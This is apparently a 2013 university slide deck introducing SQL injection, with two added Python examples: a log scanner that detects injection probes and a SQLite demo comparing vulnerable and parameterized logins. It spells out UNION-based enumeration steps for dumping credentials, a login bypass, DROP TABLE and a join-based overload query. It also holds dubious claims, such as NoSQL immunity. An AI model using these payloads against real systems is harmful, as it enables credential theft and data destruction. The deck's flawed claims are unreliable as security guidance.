A Brief Introduction in SQL Injection


Published in: Education
Slide note: Tables have relations with each other. Inserting rows into tables with unauthorized access.

    1. Security Lab, University Putra Malaysia, 23 May 2013. Sina Manavi. Contact: http://sinamanavi.blogspot.com/p/about-me.html
    2. Outline
       • Introduction
       • Why SQL injection
       • What is needed for this
       • What you can do with SQL injection
       • What are its pros and cons
       • Why we need to know about it and how we can protect our database from SQL injection attacks
    3. Introduction
       • We are all familiar with the SQL language.
       • It is one of the technologies that helped convert the static web into a dynamic one.
       • SQL is relatively easy to read, a little more difficult to write.
       • It works on servers such as Apache, MS Server, etc.
       • SQL injection means manipulating SQL tables with unauthorized access.
    4. SQL injection happens in only two forms, UI based or URL based:
       ◦ (1) Injecting into a form, such as the username and password boxes on a login page.
       ◦ (2) Injecting into a URL, like http://yourtarget.com/products/list.php?pid=10
    5. Simple example:
         SELECT ID FROM tbl_users WHERE ID="Uid" AND pass="pass"
       ◦ If it returns any value, it means the current inputs are correct.
    6. URL-based injection: www.yourtarget.com/list?id=5 is how you view a record from a table by URL, and the query behind it is
         SELECT * FROM tbl_users WHERE id=5
    7. INFORMATION_SCHEMA holds the names of every table and column on a site; its name never changes.
       ◦ Table holding all the table names: INFORMATION_SCHEMA.TABLES
       ◦ Table holding all the column names: INFORMATION_SCHEMA.COLUMNS
    8. Finding the number of columns:
       ◦ www.yourtarget.com/list.php?ID=10+ORDER+BY+1--
         Increase the 1 until you get an error; the last number that worked is the column count.
       Finding the table name:
       ◦ www.yourtarget.com/list.php?ID=-1+UNION+SELECT+1,2,3+FROM+INFORMATION_SCHEMA.TABLES--
         And it shows: tbl_user. To be continued.
    9. Now it is time to find out the column names:
       ◦ www.yourtarget.com/list.php?ID=-1+UNION+SELECT+1,column_name,3+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name='tbl_user--
         The result would be: id, username, password
       Column-name finding step:
       ◦ www.yourtarget.com/list.php?ID=-1+UNION+SELECT+1,column_name,3+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name=UserAccounts+AND+column_name>displayed_column--
         Try column names until you find your target (e.g. username, password, or login).
    10. And finally it is time to see the records:
       ◦ www.yourtarget.com/list.php?=-1+UNION+SELECT+1,username,3+FROM+UserAccounts-- and
       ◦ www.yourtarget.com/list.php?=-1+UNION+SELECT+1,password,3+FROM+UserAccounts--
       ◦ Username=admin password=123456
       ◦ Stupid admin, ha ;)
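The probing sequence on slides 8 to 10 leaves a recognisable trail in the web server's access log, which is where a defender can see it. The following Python scanner is an added example, not part of the original slides: it URL-decodes the query string of each log line, flags the ORDER BY / UNION SELECT / INFORMATION_SCHEMA signatures the slides describe, flags non-integer values for parameters the application treats as numeric, and reports addresses that issued several such requests. The Apache combined-style log format, the log lines themselves, the list of numeric parameter names and all function names are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample web-server log lines (Apache combined-log style), not real traffic.
# The requests mirror the probing sequence described on the slides.
SAMPLE_LOG = """\
203.0.113.5 - - [23/May/2013:10:00:01 +0800] "GET /list.php?ID=10 HTTP/1.1" 200 512
203.0.113.5 - - [23/May/2013:10:00:02 +0800] "GET /list.php?ID=10+ORDER+BY+1-- HTTP/1.1" 200 512
203.0.113.5 - - [23/May/2013:10:00:03 +0800] "GET /list.php?ID=10+ORDER+BY+4-- HTTP/1.1" 500 233
203.0.113.5 - - [23/May/2013:10:00:04 +0800] "GET /list.php?ID=-1+UNION+SELECT+1,2,3+FROM+INFORMATION_SCHEMA.TABLES-- HTTP/1.1" 200 601
198.51.100.7 - - [23/May/2013:10:00:05 +0800] "GET /list.php?ID=7 HTTP/1.1" 200 498
198.51.100.7 - - [23/May/2013:10:00:06 +0800] "GET /search.php?q=union+station HTTP/1.1" 200 700
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Signatures of the enumeration steps shown on the slides, matched against the
# URL-decoded parameter value so that "+" and %xx encoding cannot hide them.
PROBE_PATTERNS = {
    "order_by_probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "union_select":   re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "schema_read":    re.compile(r"\binformation_schema\.(tables|columns)\b", re.I),
    "comment_tail":   re.compile(r"(--|#|/\*)\s*$"),
}


def parse_line(line):
    """Split one log line into fields; the query string is decoded into a dict."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["query"] = dict(parse_qsl(urlsplit(rec["path"]).query, keep_blank_values=True))
    return rec


def classify_value(value):
    """Names of every probe signature that matches a decoded parameter value."""
    return [name for name, rx in PROBE_PATTERNS.items() if rx.search(value)]


def scan_log(text, numeric_params=("ID", "id", "pid")):
    """Return one finding per suspicious parameter occurrence.

    numeric_params lists parameters the application treats as integers (assumed
    here from the list.php?ID=... examples); any non-integer value for them is
    flagged even when no signature matches.
    """
    findings = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for param, value in rec["query"].items():
            tags = classify_value(value)
            if param in numeric_params and not re.fullmatch(r"-?\d+", value):
                tags.append("non_numeric_id")
            if tags:
                findings.append({"ip": rec["ip"], "param": param, "value": value,
                                 "status": int(rec["status"]), "tags": tags})
    return findings


def probing_sources(findings, threshold=2):
    """Client addresses with at least `threshold` findings: a run of ORDER BY and
    UNION requests from one address is the signal, not a single odd request."""
    counts = {}
    for f in findings:
        counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return sorted(ip for ip, n in counts.items() if n >= threshold)


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for f in found:
        print(f["ip"], f["param"], f["status"], f["tags"])
    print("probing sources:", probing_sources(found))
```

The ORDER BY step is the most useful signal because the slides' method produces a run of near-identical requests from one address ending in a server error (the 500 on the last ORDER BY attempt); the per-address threshold captures that, while the plain search for "union station" decodes to text that matches no signature and is left alone.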
    11. Now we can alter the records as well, let's rock:
          UPDATE tbl_user SET password = SHA2($password) WHERE id = $id
        Or we can insert a new user with the INSERT command.
    12. If user_list contains 1000 records, then the database is fired up by:
          SELECT * FROM user_list JOIN user_list JOIN user_list JOIN user_list JOIN user_list JOIN user_list
    13. Insert a new user into tbl_user. The malicious code can be:
          DROP TABLE tbl_user
    14. How it works:
          SELECT * FROM tbl_users WHERE id="Fname" AND pass="pass"
        Malicious code:
          SELECT * FROM table WHERE id='Fname' or 1=1;
          if (mysql_num_rows($result)) // do login
        Now the unauthorized user gets access easily and bypasses the authorization.
    15. Security is the developer's job. No database, connector, or framework can prevent SQL injection all the time.
    16. • Implement proper error handling. This would include using a single error message for all errors.
        • Lock down the user database configuration: specify users, roles and permissions, etc.
        • Prefix and append a quote to all user input, even if the data is numeric.
    17. Escaping user input in PHP:
          <?php
          function sanitize($string)
          {
              $string = strip_tags($string);
              $string = htmlspecialchars($string);
              $string = trim($string);                     // trim() already strips both ends
              $string = mysql_real_escape_string($string); // needs an open connection; mysql_* API is deprecated
              return $string;
          }
          $password = sanitize($_POST["password"]);
          // The escaped value must be wrapped in quotes (slide 16); escaping alone does nothing
          mysql_query("UPDATE Users SET password = '$password' WHERE user_id = '$user_id'");
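The login bypass on slide 14 and the escape-and-quote advice of slides 16 and 17 are shown side by side in the following Python example, which is added here and is not from the slides or their author. It uses an in-memory SQLite database with one constructed row instead of MySQL and PHP, and runs the same `' or 1=1--` input from slide 14 through three versions of the login query: the concatenated one, an escape-and-quote version, and a parameterized version. SQLite escapes a quote by doubling it, so the quoted() helper stands in for mysql_real_escape_string; the table contents, the credentials and all function names are constructed.

```python
import sqlite3


def make_db():
    """In-memory stand-in for tbl_users with one constructed row (not real credentials).
    Passwords are stored in clear only to keep the demo short; hash them in practice."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE tbl_users (id INTEGER PRIMARY KEY, username TEXT, pass TEXT)")
    con.execute("INSERT INTO tbl_users VALUES (1, 'admin', 'correct-horse-battery')")
    con.commit()
    return con


def login_concat(con, username, password):
    """The slide-14 pattern: user input pasted straight into the SQL text."""
    sql = f"SELECT id FROM tbl_users WHERE username='{username}' AND pass='{password}'"
    return con.execute(sql).fetchone() is not None


def login_escaped(con, username, password):
    """Slide-16 advice done fully: escape the quote character *and* wrap the value
    in quotes. Escaping without the surrounding quotes leaves the value free to
    change the statement, and every call site has to remember both steps."""
    def quoted(s):
        return "'" + s.replace("'", "''") + "'"   # SQL-standard quote doubling (SQLite)
    sql = (f"SELECT id FROM tbl_users WHERE username={quoted(username)} "
           f"AND pass={quoted(password)}")
    return con.execute(sql).fetchone() is not None


def login_param(con, username, password):
    """Parameterized query: the statement shape is fixed before any input is seen,
    so input is only ever compared as data (the parameters quote for you)."""
    row = con.execute("SELECT id FROM tbl_users WHERE username=? AND pass=?",
                      (username, password)).fetchone()
    return row is not None


def get_record(con, id_text):
    """URL-based lookup from slide 6 (list.php?id=5) with a type check first:
    anything that is not an integer is rejected before it reaches SQL, and the
    caller should answer with one generic error message (slide 16)."""
    try:
        rid = int(id_text)
    except ValueError:
        return None
    return con.execute("SELECT id, username FROM tbl_users WHERE id=?", (rid,)).fetchone()


if __name__ == "__main__":
    con = make_db()
    payload = "' or 1=1--"    # the slide-14 bypass input, constructed for the demo
    print("concat  :", login_concat(con, "admin", payload))   # True: authorization bypassed
    print("escaped :", login_escaped(con, "admin", payload))  # False
    print("param   :", login_param(con, "admin", payload))    # False
    print("record  :", get_record(con, "-1 UNION SELECT 1,2,3--"))  # None: rejected before SQL
```

With the concatenated query the trailing `--` turns the closing quote into a comment and `or 1=1` makes the WHERE clause true for every row, exactly as slide 14 describes; the quoted version keeps the whole input inside one string literal, and the parameterized version never builds SQL from the input at all, which is why the slides' last point, "parameters are the fix", still needs the type check in get_record for values the application expects to be numeric.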
    18. Vipin Samar, Oracle vice president of Database Security: "Database Firewall is a good first layer of defense for databases but it won't protect you from everything."
    19. Using stored procedures:
          CREATE PROCEDURE SP_show_user(IN U_ID INT)   -- parameter needs a type in MySQL
          BEGIN
            SELECT * FROM Bugs WHERE User_ID = U_ID;
          END
          CALL SP_show_user(54)
        "Might be helpful but still vulnerable"
    20. Myths:
        • I don't have to worry anymore
        • Escaping is the fix
        • More escaping is better
        • I can code an escaping function
        • Only user input is unsafe
        • Stored procs are the fix
        • SQL privileges are the fix
        • My app doesn't need security
        • Frameworks are the fix
        • Parameters quote for you
        • Parameters are the fix
        • Parameters make queries slow
        • SQL proxies are the fix
        • NoSQL databases are the fix
    21. NoSQL databases are immune to SQL injection.